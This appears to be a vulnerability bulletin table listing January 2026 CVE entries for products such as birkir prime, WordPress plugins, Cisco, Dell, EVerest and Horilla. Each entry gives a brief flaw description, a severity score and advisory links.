| birkir--prime | A vulnerability was found in birkir prime up to 0.4.0.beta.0. The impacted element is an unknown function of the file /graphql of the component GraphQL Array Based Query Batch Handler. The manipulation results in denial of service. The attack can be executed remotely. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-01-19 | 5.3 | CVE-2026-1173 | VDB-341767 | birkir prime GraphQL Array Based Query Batch graphql denial of service VDB-341767 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731104 | birkir prime <=0.4.0 Graphql Array Based Query Batching Vulnerability https://github.com/birkir/prime/issues/544 |
| birkir--prime | A vulnerability was determined in birkir prime up to 0.4.0.beta.0. This affects an unknown function of the file /graphql of the component GraphQL Alias Handler. This manipulation causes resource consumption. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet. | 2026-01-19 | 5.3 | CVE-2026-1174 | VDB-341768 | birkir prime GraphQL Alias graphql resource consumption VDB-341768 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731105 | birkir prime <=0.4.0 GraphQL Aliases Overloading Vulnerability https://github.com/birkir/prime/issues/545 |
| birkir--prime | A vulnerability was identified in birkir prime up to 0.4.0.beta.0. This impacts an unknown function of the file /graphql of the component GraphQL Directive Handler. Such manipulation leads to information exposure through error message. The attack may be performed from remote. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-01-19 | 5.3 | CVE-2026-1175 | VDB-341769 | birkir prime GraphQL Directive graphql information exposure VDB-341769 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731106 | birkir prime <=0.4.0 GraphQL Directive Information Disclosure https://github.com/birkir/prime/issues/546 |
| birkir--prime | A security vulnerability has been detected in birkir prime up to 0.4.0.beta.0. This vulnerability affects unknown code. Such manipulation leads to cross-site request forgery. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-01-19 | 4.3 | CVE-2026-1169 | VDB-341763 | birkir prime cross-site request forgery VDB-341763 | CTI Indicators (IOB, IOC) Submit #731287 | birkir prime <=0.4.0 CSRF https://github.com/birkir/prime/issues/547 |
| Bjskzy--Zhiyou ERP | A vulnerability was detected in Bjskzy Zhiyou ERP up to 11.0. Impacted is the function initRCForm of the file RichClientService.class of the component com.artery.richclient.RichClientService. Performing a manipulation results in xml external entity reference. The attack is possible to be carried out remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-20 | 6.3 | CVE-2026-1218 | VDB-341908 | Bjskzy Zhiyou ERP com.artery.richclient.RichClientService RichClientService.class initRCForm xml external entity reference VDB-341908 | CTI Indicators (IOB, IOC, IOA) Submit #735201 | Bjskzy Enterprise Resource Planning Software 11.0 XML External Entity Reference https://github.com/dingpotian/cve-vul/blob/main/Shikong-Zhiyou-ERP/Shikong-Zhiyou-ERP-XXE-RichClientService-initRCForm.md |
| BloofoxCMS--BloofoxCMS | BloofoxCMS 0.5.2.1 contains a stored cross-site scripting vulnerability in the articles text parameter that allows authenticated attackers to inject malicious scripts. Attackers can insert malicious javascript payloads in the text field to execute scripts and potentially steal authenticated users' cookies. | 2026-01-23 | 6.4 | CVE-2021-47906 | ExploitDB-49492 Official Vendor Homepage BloofoxCMS Software Releases VulnCheck Advisory: BloofoxCMS 0.5.2.1 - 'text' Stored Cross Site Scripting |
| Bosch--Infotainment system ECU | The Infotainment ECU manufactured by Bosch which is installed in Nissan Leaf ZE1 - 2020 uses a Redbend service for over-the-air provisioning and updates. HTTPS is used for communication with the back-end server. Due to usage of the default configuration for the underlying SSL engine, the server root certificate is not verified. As a result, an attacker may be able to impersonate a Redbend backend server using a self-signed certificate. First identified on Nissan Leaf ZE1 manufactured in 2020. | 2026-01-22 | 6.5 | CVE-2025-32057 | https://www.nissan.co.uk/vehicles/new-vehicles/leaf.html http://i.blackhat.com/Asia-25/Asia-25-Evdokimov-Remote-Exploitation-of-Nissan-Leaf.pdf https://pcacybersecurity.com/resources/advisory/vulnerabilities-in-nissan-infotainment-manufactured-by-bosch |
| Bosch--Infotainment system ECU | The anti-theft protection mechanism can be bypassed by attackers due to weak response generation algorithms for the head unit. It is possible to reveal all 32 corresponding responses by sniffing CAN traffic or by pre-calculating the values, which allow to bypass the protection. First identified on Nissan Leaf ZE1 manufactured in 2020. | 2026-01-22 | 4 | CVE-2025-32056 | https://www.nissan.co.uk/vehicles/new-vehicles/leaf.html http://i.blackhat.com/Asia-25/Asia-25-Evdokimov-Remote-Exploitation-of-Nissan-Leaf.pdf https://pcacybersecurity.com/resources/advisory/vulnerabilities-in-nissan-infotainment-manufactured-by-bosch |
| brainstormforce--Custom Fonts Host Your Fonts Locally | The Custom Fonts - Host Your Fonts Locally plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'BCF_Google_Fonts_Compatibility' class constructor function in all versions up to, and including, 2.1.16. This makes it possible for unauthenticated attackers to delete font directory and rewrite theme.json file. | 2026-01-20 | 5.3 | CVE-2025-14351 | https://www.wordfence.com/threat-intel/vulnerabilities/id/60e3a506-8811-4e7d-a16c-02f91c757705?source=cve https://plugins.trac.wordpress.org/browser/custom-fonts/trunk/includes/class-bcf-google-fonts-compatibility.php#L88 https://plugins.trac.wordpress.org/changeset/3442237/custom-fonts |
| bramdnl--Star Review Manager | The Star Review Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.2. This is due to missing nonce validation on the settings page. This makes it possible for unauthenticated attackers to update the plugin's CSS settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-24 | 4.3 | CVE-2026-1076 | https://www.wordfence.com/threat-intel/vulnerabilities/id/54b6a141-eb4c-4cf0-a078-5b3aeda25466?source=cve https://plugins.trac.wordpress.org/browser/star-review-manager/trunk/admin/settings.php#L3 https://plugins.trac.wordpress.org/browser/star-review-manager/tags/1.2.2/admin/settings.php#L3 |
| BROWAN COMMUNICATIONS--PrismX MX100 AP controller | PrismX MX100 AP controller developed by BROWAN COMMUNICATIONS has an Insufficiently Protected Credentials vulnerability, allowing privileged remote attackers to allowing authenticated remote attackers to obtain SMTP plaintext passwords through the web frontend. | 2026-01-20 | 4.9 | CVE-2026-1223 | https://www.twcert.org.tw/tw/cp-132-10642-3b808-1.html https://www.twcert.org.tw/en/cp-139-10643-2f8d7-2.html |
| cantothemes--Canto Testimonials | The Canto Testimonials plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'fx' shortcode attribute in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-24 | 6.4 | CVE-2026-1095 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6f2ef250-f951-4408-ac42-3272ddf46530?source=cve https://plugins.trac.wordpress.org/browser/canto-testimonials/trunk/canto-testimonials.php#L132 https://plugins.trac.wordpress.org/browser/canto-testimonials/tags/1.0/canto-testimonials.php#L132 |
| Cisco--Cisco Intersight Virtual Appliance | A vulnerability in the read-only maintenance shell of Cisco Intersight Virtual Appliance could allow an authenticated, local attacker with administrative privileges to elevate privileges to root on the virtual appliance. This vulnerability is due to improper file permissions on configuration files for system accounts within the maintenance shell of the virtual appliance. An attacker could exploit this vulnerability by accessing the maintenance shell as a read-only administrator and manipulating system files to grant root privileges. A successful exploit could allow the attacker to elevate their privileges to root on the virtual appliance and gain full control of the appliance, giving them the ability to access sensitive information, modify workloads and configurations on the host system, and cause a denial of service (DoS). | 2026-01-21 | 6 | CVE-2026-20092 | cisco-sa-intersight-privesc-p6tBm6jk |
| Cisco--Cisco Packaged Contact Center Enterprise | Multiple vulnerabilities in the web-based management interface of Cisco Packaged Contact Center Enterprise (Packaged CCE) and Cisco Unified Contact Center Enterprise (Unified CCE) could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. These vulnerabilities exist because the web-based management interface does not properly validate user-supplied input. An attacker could exploit these vulnerabilities by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit these vulnerabilities, the attacker must have valid administrative credentials. | 2026-01-21 | 4.8 | CVE-2026-20055 | cisco-sa-ucce-pcce-xss-2JVyg3uD |
| Cisco--Cisco Packaged Contact Center Enterprise | Multiple vulnerabilities in the web-based management interface of Cisco Packaged Contact Center Enterprise (Packaged CCE) and Cisco Unified Contact Center Enterprise (Unified CCE) could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. These vulnerabilities exist because the web-based management interface does not properly validate user-supplied input. An attacker could exploit these vulnerabilities by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit these vulnerabilities, the attacker must have valid administrative credentials. | 2026-01-21 | 4.8 | CVE-2026-20109 | cisco-sa-ucce-pcce-xss-2JVyg3uD |
| Cisco--Cisco Ultra-Reliable Wireless Backhaul | A vulnerability in the SSH service of Cisco IEC6400 Wireless Backhaul Edge Compute Software could allow an unauthenticated, remote attacker to cause the SSH service to stop responding. This vulnerability exists because the SSH service lacks effective flood protection. An attacker could exploit this vulnerability by initiating a denial of service (DoS) attack against the SSH port. A successful exploit could allow the attacker to cause the SSH service to be unresponsive during the period of the DoS attack. All other operations remain stable during the attack. | 2026-01-21 | 5.3 | CVE-2026-20080 | cisco-sa-iec6400-Pem5uQ7v |
| Click2Magic--Click2Magic | Click2Magic 1.1.5 contains a stored cross-site scripting vulnerability that allows attackers to inject malicious scripts in the chat name input. Attackers can craft a malicious payload in the chat name to capture administrator cookies when the admin processes user requests. | 2026-01-25 | 6.4 | CVE-2020-36931 | ExploitDB-49347 Vendor Homepage Official Product Website VulnCheck Advisory: Click2Magic 1.1.5 - Stored Cross-Site Scripting |
| codemacher--CM CSS Columns | The CM CSS Columns plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'tag' shortcode attribute in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-24 | 6.4 | CVE-2026-1098 | https://www.wordfence.com/threat-intel/vulnerabilities/id/dabcc606-04ab-4fb0-bf3c-d3ad915b8904?source=cve https://plugins.trac.wordpress.org/browser/cm-css-columns/trunk/includes/Shortcoder.php#L109 https://plugins.trac.wordpress.org/browser/cm-css-columns/tags/1.2.1/includes/Shortcoder.php#L109 |
| controlplaneio-fluxcd--flux-operator | The Flux Operator is a Kubernetes CRD controller that manages the lifecycle of CNCF Flux CD and the ControlPlane enterprise distribution. Starting in version 0.36.0 and prior to version 0.40.0, a privilege escalation vulnerability exists in the Flux Operator Web UI authentication code that allows an attacker to bypass Kubernetes RBAC impersonation and execute API requests with the operator's service account privileges. In order to be vulnerable, cluster admins must configure the Flux Operator with an OIDC provider that issues tokens lacking the expected claims (e.g., `email`, `groups`), or configure custom CEL expressions that can evaluate to empty values. After OIDC token claims are processed through CEL expressions, there is no validation that the resulting `username` and `groups` values are non-empty. When both values are empty, the Kubernetes client-go library does not add impersonation headers to API requests, causing them to be executed with the flux-operator service account's credentials instead of the authenticated user's limited permissions. This can result in privilege escalation, data exposure, and/or information disclosure. Version 0.40.0 patches the issue. | 2026-01-21 | 5.3 | CVE-2026-23990 | https://github.com/controlplaneio-fluxcd/flux-operator/security/advisories/GHSA-4xh5-jcj2-ch8q https://github.com/controlplaneio-fluxcd/flux-operator/pull/610 https://github.com/controlplaneio-fluxcd/flux-operator/commit/084540424f6de8ba5d88fb1fd1e8472ba29afd7e https://github.com/controlplaneio-fluxcd/flux-operator/releases/tag/v0.40.0 |
| CRMEB--CRMEB | A weakness has been identified in CRMEB up to 5.6.3. The impacted element is the function remoteRegister of the file crmeb/app/services/user/LoginServices.php of the component JSON Token Handler. Executing a manipulation of the argument uid can lead to improper authentication. The attack may be performed from remote. The attack requires a high level of complexity. The exploitability is regarded as difficult. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-20 | 5.6 | CVE-2026-1203 | VDB-341789 | CRMEB JSON Token LoginServices.php remoteRegister improper authentication VDB-341789 | CTI Indicators (IOB, IOC, IOA) Submit #735349 | Zhongbang CRMEB v5.6.3 Authentication Bypass by https://github.com/foeCat/CVE/blob/main/CRMEB/jwt_auth_bypass/remote_register_jwt_bypass.md |
| cubewp1211--CubeWP Framework | The CubeWP - All-in-One Dynamic Content Framework plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.1.27 via the search feature in class-cubewp-search-ajax-hooks.php due to insufficient restrictions on which posts can be included. This makes it possible for unauthenticated attackers to extract data from password protected, private, or draft posts that they should not have access to. | 2026-01-25 | 4.3 | CVE-2025-6461 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0edb6b7c-8a78-44b9-a5d6-b4a563c92484?source=cve https://plugins.trac.wordpress.org/changeset/3422640/cubewp-framework/trunk/cube/modules/search/class-cubewp-search-ajax-hooks.php |
| Dell--Data Protection Advisor | Dell Data Protection Advisor, versions prior to 19.12, contains an Improper Neutralization of Special Elements Used in a Template Engine vulnerability in the Server. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Information exposure. | 2026-01-23 | 4.3 | CVE-2025-46699 | https://www.dell.com/support/kbdoc/en-us/000281732/dsa-2025-075-security-update-for-dell-data-protection-advisor-for-multiple-component-vulnerabilities |
| Dell--ObjectScale | Dell ECS, versions 3.8.1.0 through 3.8.1.7, and Dell ObjectScale versions prior to 4.2.0.0, contains a Cleartext Transmission of Sensitive Information vulnerability in the Fabric Syslog. An unauthenticated attacker with remote access could potentially exploit this vulnerability to intercept and modify information in transit. | 2026-01-23 | 6.5 | CVE-2026-22274 | https://www.dell.com/support/kbdoc/en-us/000415880/dsa-2026-047-security-update-for-dell-ecs-and-objectscale-multiple-vulnerabilities |
| Dell--ObjectScale | Dell ECS, versions 3.8.1.0 through 3.8.1.7, and Dell ObjectScale versions prior to 4.2.0.0, contains a Cleartext Storage of Sensitive Information vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Information disclosure. | 2026-01-23 | 5.5 | CVE-2026-22276 | https://www.dell.com/support/kbdoc/en-us/000415880/dsa-2026-047-security-update-for-dell-ecs-and-objectscale-multiple-vulnerabilities |
| Dell--ObjectScale | Dell ECS, versions 3.8.1.0 through 3.8.1.7, and Dell ObjectScale versions prior to 4.2.0.0, contains an Inclusion of Sensitive Information in Source Code vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Information exposure. | 2026-01-23 | 4.4 | CVE-2026-22275 | https://www.dell.com/support/kbdoc/en-us/000415880/dsa-2026-047-security-update-for-dell-ecs-and-objectscale-multiple-vulnerabilities |
| Dell--PowerScale OneFS | Dell PowerScale OneFS, versions 9.5.0.0 through 9.5.1.5, versions 9.6.0.0 through 9.7.1.10, versions 9.8.0.0 through 9.10.1.3, versions starting from 9.11.0.0 and prior to 9.13.0.0, contains an incorrect permission assignment for critical resource vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to denial of service. | 2026-01-22 | 5 | CVE-2026-22280 | https://www.dell.com/support/kbdoc/en-us/000415586/dsa-2026-049-security-update-for-dell-powerscale-onefs-multiple-vulnerabilities |
| Dell--PowerScale OneFS | Dell PowerScale OneFS, versions prior 9.13.0.0, contains an insufficient logging vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to information tampering. | 2026-01-22 | 4.3 | CVE-2026-22279 | https://www.dell.com/support/kbdoc/en-us/000415586/dsa-2026-049-security-update-for-dell-powerscale-onefs-multiple-vulnerabilities |
| devsoftbaltic--SurveyJS: Drag & Drop Form Builder | The SurveyJS: Drag & Drop WordPress Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.12.20. This is due to missing nonce validation on the SurveyJS_AddSurvey AJAX action. This makes it possible for unauthenticated attackers to create surveys via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-24 | 4.3 | CVE-2025-13139 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0c06880e-06cc-4204-a031-355de4de3af2?source=cve https://plugins.trac.wordpress.org/browser/surveyjs/tags/1.12.20/ajax_handlers/add_survey.php#L12 |
| devsoftbaltic--SurveyJS: Drag & Drop Form Builder | The SurveyJS: Drag & Drop WordPress Form Builder to create, style and embed multiple forms of any complexity plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.12.20. This is due to missing nonce verification on the 'SurveyJS_RenameSurvey' AJAX action. This makes it possible for unauthenticated attackers to rename surveys via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-24 | 4.3 | CVE-2025-13194 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ab88f0cf-971f-43e1-b6b7-4eb55188ecc8?source=cve https://plugins.trac.wordpress.org/browser/surveyjs/tags/1.12.20/ajax_handlers/rename_survey.php#L12 |
| devsoftbaltic--SurveyJS: Drag & Drop Form Builder | The SurveyJS: Drag & Drop WordPress Form Builder to create, style and embed multiple forms of any complexity plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.12.20. This is due to missing or incorrect nonce validation on the `SurveyJS_CloneSurvey` AJAX action. This makes it possible for unauthenticated attackers to duplicate surveys via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-24 | 4.3 | CVE-2025-13205 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e1179303-fe7c-47f1-958c-2e4d2c574e4a?source=cve https://plugins.trac.wordpress.org/browser/surveyjs/tags/1.12.20/ajax_handlers/clone_survey.php#L8 |
| Discord--WebSocket API service | Discord through 2026-01-16 allows gathering information about whether a user's client state is Invisible (and not actually offline) because the response to a WebSocket API request includes the user in the presences array (with "status": "offline"), whereas offline users are omitted from the presences array. This is arguably inconsistent with the UI description of Invisible as "You will appear offline." | 2026-01-22 | 4.3 | CVE-2026-24332 | https://xmrcat.org/discord-invisibility-bypass |
| EVerest--everest-core | EVerest is an EV charging software stack. Prior to version 2025.10.0, C++ exceptions are not properly handled for and by the `TbdController` loop, leading to its caller and itself to silently terminates. Thus, this leads to a denial of service as it is responsible of SDP and ISO15118-20 servers. Version 2025.10.0 fixes the issue. | 2026-01-21 | 6.5 | CVE-2025-68135 | https://github.com/EVerest/everest-core/security/advisories/GHSA-g7mm-r6qp-96vh |
| EVerest--everest-core | EVerest is an EV charging software stack, and EVerest libocpp is a C++ implementation of the Open Charge Point Protocol. In libocpp prior to version 0.30.1, pointers returned by the `strdup` calls are never freed. At each connection attempt, the newly allocated memory area will be leaked, potentially causing memory exhaustion and denial of service. Version 0.30.1 fixes the issue. | 2026-01-21 | 4.7 | CVE-2025-68138 | https://github.com/EVerest/everest-core/security/advisories/GHSA-f8c2-44c3-7v55 https://github.com/EVerest/libocpp/blob/89c7b62ec899db637f43b54f19af2c4af30cfa66/lib/ocpp/common/websocket/websocket_libwebsockets.cpp |
| EVerest--everest-core | EVerest is an EV charging software stack. In all versions up to and including 2025.12.1, the default value for `terminate_connection_on_failed_response` is `False`, which leaves the responsibility for session and connection termination to the EV. In this configuration, any errors encountered by the module are logged but do not trigger countermeasures such as session and connection reset or termination. This could be abused by a malicious user in order to exploit other weaknesses or vulnerabilities. While the default will stay at the setting that is described as potentially problematic in this reported issue, a mitigation is available by changing the `terminate_connection_on_failed_response` setting to `true`. However this cannot be set to this value by default since it can trigger errors in vehicle ECUs requiring ECU resets and lengthy unavailability in charging for vehicles. The maintainers judge this to be a much more important workaround then short-term unavailability of an EVSE, therefore this setting will stay at the current value. | 2026-01-21 | 4.3 | CVE-2025-68139 | https://github.com/EVerest/everest-core/security/advisories/GHSA-wqh4-pj54-6xv9 |
| EVerest--everest-core | EVerest is an EV charging software stack. Prior to version 2025.9.0, once the validity of the received V2G message has been verified, it is checked whether the submitted session ID matches the registered one. However, if no session has been registered, the default value is 0. Therefore, a message submitted with a session ID of 0 is accepted, as it matches the registered value. This could allow unauthorized and anonymous indirect emission of MQTT messages and communication with V2G messages handlers, updating a session context. Version 2025.9.0 fixes the issue. | 2026-01-21 | 4.3 | CVE-2025-68140 | https://github.com/EVerest/everest-core/security/advisories/GHSA-w385-3jwp-x47x |
| EVerest--everest-core | EVerest is an EV charging software stack. Prior to version 2025.9.0, in several places, integer values are concatenated to literal strings when throwing errors. This results in pointers arithmetic instead of printing the integer value as expected, like most of interpreted languages. This can be used by malicious operator to read unintended memory regions, including the heap and the stack. Version 2025.9.0 fixes the issue. | 2026-01-21 | 4.2 | CVE-2026-23955 | https://github.com/EVerest/everest-core/security/advisories/GHSA-px57-jx97-hrff |
| filebrowser--filebrowser | File Browser provides a file managing interface within a specified directory and can be used to upload, delete, preview, rename, and edit files. Prior to version 2.55.0, the JSONAuth. Auth function contains a logic flaw that allows unauthenticated attackers to enumerate valid usernames by measuring the response time of the /api/login endpoint. The vulnerability exists due to a "short-circuit" evaluation in the authentication logic. When a username is not found in the database, the function returns immediately. However, if the username does exist, the code proceeds to verify the password using bcrypt (users.CheckPwd), which is a computationally expensive operation designed to be slow. This difference in execution path creates a measurable timing discrepancy. Version 2.55.0 contains a patch for the issue. | 2026-01-19 | 5.3 | CVE-2026-23849 | https://github.com/filebrowser/filebrowser/security/advisories/GHSA-43mm-m3h2-3prc https://github.com/filebrowser/filebrowser/commit/24781badd413ee20333aba5cce1919d676e01889 |
| flatboy--FlatPM Ad Manager, AdSense and Custom Code | The FlatPM - Ad Manager, AdSense and Custom Code plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'rank_math_description' custom field in all versions up to, and including, 3.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-20 | 6.4 | CVE-2026-0690 | https://www.wordfence.com/threat-intel/vulnerabilities/id/14b89618-8a30-4b8c-9490-f05e8fa8ca8a?source=cve https://plugins.trac.wordpress.org/changeset/3434760/flatpm-wp |
| Foxit Software Inc.--na1.foxitesign.foxit.com | URL parameters are directly embedded into JavaScript code or HTML attributes without proper encoding or sanitization. This allows attackers to inject arbitrary scripts when an authenticated user visits a crafted link. This issue affects na1.foxitesign.foxit.com: before 2026‑01‑16. | 2026-01-20 | 6.1 | CVE-2025-66523 | https://www.foxit.com/support/security-bulletins.html |
| franklioxygen--MyTube | MyTube is a self-hosted downloader and player for several video websites. Prior to version 1.7.71, a rate limiting bypass via `X-Forwarded-For` header spoofing allows unauthenticated attackers to bypass IP-based rate limiting on general API endpoints. Attackers can spoof client IPs by manipulating the `X-Forwarded-For` header, enabling unlimited requests to protected endpoints, including general API endpoints (enabling DoS) and other rate-limited functionality. Version 1.7.71 contains a patch for the issue. | 2026-01-19 | 6.5 | CVE-2026-23848 | https://github.com/franklioxygen/MyTube/security/advisories/GHSA-59gr-529g-x45h https://github.com/franklioxygen/MyTube/commit/bc057458804ae7ac70ea00605680512ed3d4257b |
| freemp--JavaScript Notifier | The JavaScript Notifier plugin for WordPress is vulnerable to Stored Cross-Site Scripting via plugin settings in all versions up to, and including, 1.2.8. This is due to insufficient input sanitization and output escaping on user-supplied attributes in the `wp_footer` action. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-24 | 4.4 | CVE-2026-1191 | https://www.wordfence.com/threat-intel/vulnerabilities/id/97696702-4d40-41dd-a25f-f2ee7681a2c9?source=cve https://plugins.trac.wordpress.org/browser/javascript-notifier/trunk/javascript-notifier.php#L75 https://plugins.trac.wordpress.org/browser/javascript-notifier/tags/1.2.8/javascript-notifier.php#L75 |
| GetSimple CMS--Custom JS Plugin | GetSimple CMS Custom JS 0.1 plugin contains a cross-site request forgery vulnerability that allows unauthenticated attackers to inject arbitrary client-side code into administrator browsers. Attackers can craft a malicious website that triggers a cross-site scripting payload to execute remote code on the hosting server when an authenticated administrator visits the page. | 2026-01-21 | 5.3 | CVE-2021-47860 | ExploitDB-49816 Vendor Homepage GetSimple CMS GitHub Repository Researcher Disclosure ExploitDB-49712 VulnCheck Advisory: GetSimple CMS Custom JS 0.1 - CSRF to XSS to RCE |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 17.1 before 18.6.4, 18.7 before 18.7.2, and 18.8 before 18.8.2 that under certain circumstances could have allowed an authenticated user to create a denial of service condition by configuring malformed Wiki documents that bypass cycle detection. | 2026-01-22 | 6.5 | CVE-2025-13335 | GitLab Issue #581060 HackerOne Bug Bounty Report #3418023 https://about.gitlab.com/releases/2026/01/21/patch-release-gitlab-18-8-2-released/ |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 12.3 before 18.6.4, 18.7 before 18.7.2, and 18.8 before 18.8.2 that could have allowed an unauthenticated user to create a denial of service condition by sending repeated malformed SSH authentication requests. | 2026-01-22 | 5.3 | CVE-2026-1102 | GitLab Issue #579746 https://about.gitlab.com/releases/2026/01/21/patch-release-gitlab-18-8-2-released/ |
| hallsofmontezuma--Moderate Selected Posts | The Moderate Selected Posts plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4. This is due to missing nonce verification on the msp_admin_page() function. This makes it possible for unauthenticated attackers to modify plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-24 | 4.3 | CVE-2025-14907 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4bc23291-1b73-4e92-83ba-0c7f455ac126?source=cve https://plugins.trac.wordpress.org/browser/moderate-selected-posts/tags/1.4/inc/admin.php#L71 |
| HAMASTAR Technology--MeetingHub | MeetingHub developed by HAMASTAR Technology has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to access specific API functions and obtain meeting-related information. | 2026-01-22 | 5.3 | CVE-2026-1332 | https://www.twcert.org.tw/tw/cp-132-10650-a5ee9-1.html https://www.twcert.org.tw/en/cp-139-10651-ff09c-2.html |
| horilla-opensource--horilla | Horilla is a free and open source Human Resource Management System (HRMS). In versions prior to 1.5.0, a cross-site scripting vulnerability can be triggered because the extension and content-type are not checked during the profile photo update step. Version 1.5.0 fixes the issue. | 2026-01-22 | 5.4 | CVE-2026-24034 | https://github.com/horilla-opensource/horilla/security/advisories/GHSA-mvwg-7c8w-qw2p https://github.com/horilla-opensource/horilla/releases/tag/1.5.0 |
| horilla-opensource--horilla | Horilla is a free and open source Human Resource Management System (HRMS). Versions 1.4.0 and above expose unpublished job postings through the /recruitment/recruitment-details// endpoint without authentication. The response includes draft job titles, descriptions and application link allowing unauthenticated users to view unpublished roles and access the application workflow for unpublished jobs. Unauthorized access to unpublished job posts can leak sensitive internal hiring information and cause confusion among candidates. This issue has been fixed in version 1.5.0. | 2026-01-22 | 5.3 | CVE-2026-24036 | https://github.com/horilla-opensource/horilla/security/advisories/GHSA-q4xr-w96p-3vg7 https://github.com/horilla-opensource/horilla/commit/9a585a1588431499092a49d7e82cb77daa4d99ee https://github.com/horilla-opensource/horilla/releases/tag/1.5.0 |
| horilla-opensource--horilla | Horilla is a free and open source Human Resource Management System (HRMS). An Improper Access Control vulnerability exists in Horilla HR Software starting in version 1.4.0 and prior to version 1.5.0, allowing any authenticated employee to upload documents on behalf of another employee without proper authorization. This occurs due to insufficient server-side validation of the employee_id parameter during file upload operations, allowing any authenticated employee to upload document in behalf of any employee. Version 1.5.0 fixes the issue. | 2026-01-22 | 4.3 | CVE-2026-24035 | https://github.com/horilla-opensource/horilla/security/advisories/GHSA-fm3f-xpgx-8xr3 https://drive.google.com/file/d/1i00-NnipvxH8bGY-SyqEjnDQfxIbVGRR/view?usp=sharing https://github.com/horilla-opensource/horilla/releases/tag/1.5.0 |
| horilla-opensource--horilla | Horilla is a free and open source Human Resource Management System (HRMS). In version 1.4.0, the has_xss() function attempts to block XSS by matching input against a set of regex patterns. However, the regexes are incomplete and context-agnostic, making them easy to bypass. Attackers are able to redirect users to malicious domains, run external JavaScript, and steal CSRF tokens that can be used to craft CSRF attacks against admins. This issue has been fixed in version 1.5.0. | 2026-01-22 | 4.8 | CVE-2026-24037 | https://github.com/horilla-opensource/horilla/security/advisories/GHSA-rqw5-fjm4-rgvm https://github.com/horilla-opensource/horilla/releases/tag/1.5.0 |
| horilla-opensource--horilla | Horilla is a free and open source Human Resource Management System (HRMS). Version 1.4.0 has Improper Access Control, allowing low-privileged employees to self-approve documents they have uploaded. The document-approval UI is intended to be restricted to administrator or high-privilege roles only; however, an insufficient server-side authorization check on the approval endpoint lets a standard employee modify the approval status of their own uploaded document. A successful exploitation allows users with only employee-level permissions to alter application state reserved for administrators. This undermines the integrity of HR processes (for example, acceptance of credentials, certifications, or supporting materials), and may enable submission of unvetted documents. This issue is fixed in version 1.5.0. | 2026-01-22 | 4.3 | CVE-2026-24039 | https://github.com/horilla-opensource/horilla/security/advisories/GHSA-99mq-mhwv-w9qx https://github.com/horilla-opensource/horilla/releases/tag/1.5.0 |
| IBM--Application Gateway | IBM Application Gateway 23.10 through 25.09 is vulnerable to cross-site scripting. This vulnerability allows an authenticated user to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. | 2026-01-20 | 5.4 | CVE-2025-36396 | https://www.ibm.com/support/pages/node/7256857 |
| IBM--Application Gateway | IBM Application Gateway 23.10 through 25.09 is vulnerable to HTML injection. A remote attacker could inject malicious HTML code, which when viewed, would be executed in the victim's Web browser within the security context of the hosting site. | 2026-01-20 | 5.4 | CVE-2025-36397 | https://www.ibm.com/support/pages/node/7256857 |
